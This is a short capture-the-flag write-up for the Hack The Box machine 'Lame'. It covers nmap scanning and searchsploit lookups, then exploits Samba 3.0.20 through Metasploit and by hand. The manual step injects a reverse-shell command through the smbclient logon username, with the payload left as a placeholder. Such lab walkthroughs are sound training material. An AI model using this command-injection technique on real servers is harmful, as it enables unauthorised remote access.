We put the IP in hosts:
nmap -sC -sV -Pn lame.htb | tee nmap.txt
21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 39/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
We look for a version with searchsploit:
searchsploit vsftpd 2.3.4
It gives us an exploit for Metasploit, but to do it by hand we copy it and search for the source of the PoC:
searchsploit -m unix/remote/17491.rb
When reading it this page appears.
So this version of FTP has a failure where if you introduce
:) as the user it would give total access to the FTP. But in this case, this is not working.
39/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Looking in Searchsploit we look for Samba’s version and it returns this:
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
So, using Samba 3.0.20 exploit from Metasploit we get instant root access to the machine.
Same exploit but done by hand, from smbclient:
# Connection to the machine smbclient //lame.htb/tmp
We use this command:
logon "./=`nohup <REVERSE SHELL>`"
logon we are connecting to samba and with
nohup we are avoiding the connection to hangup.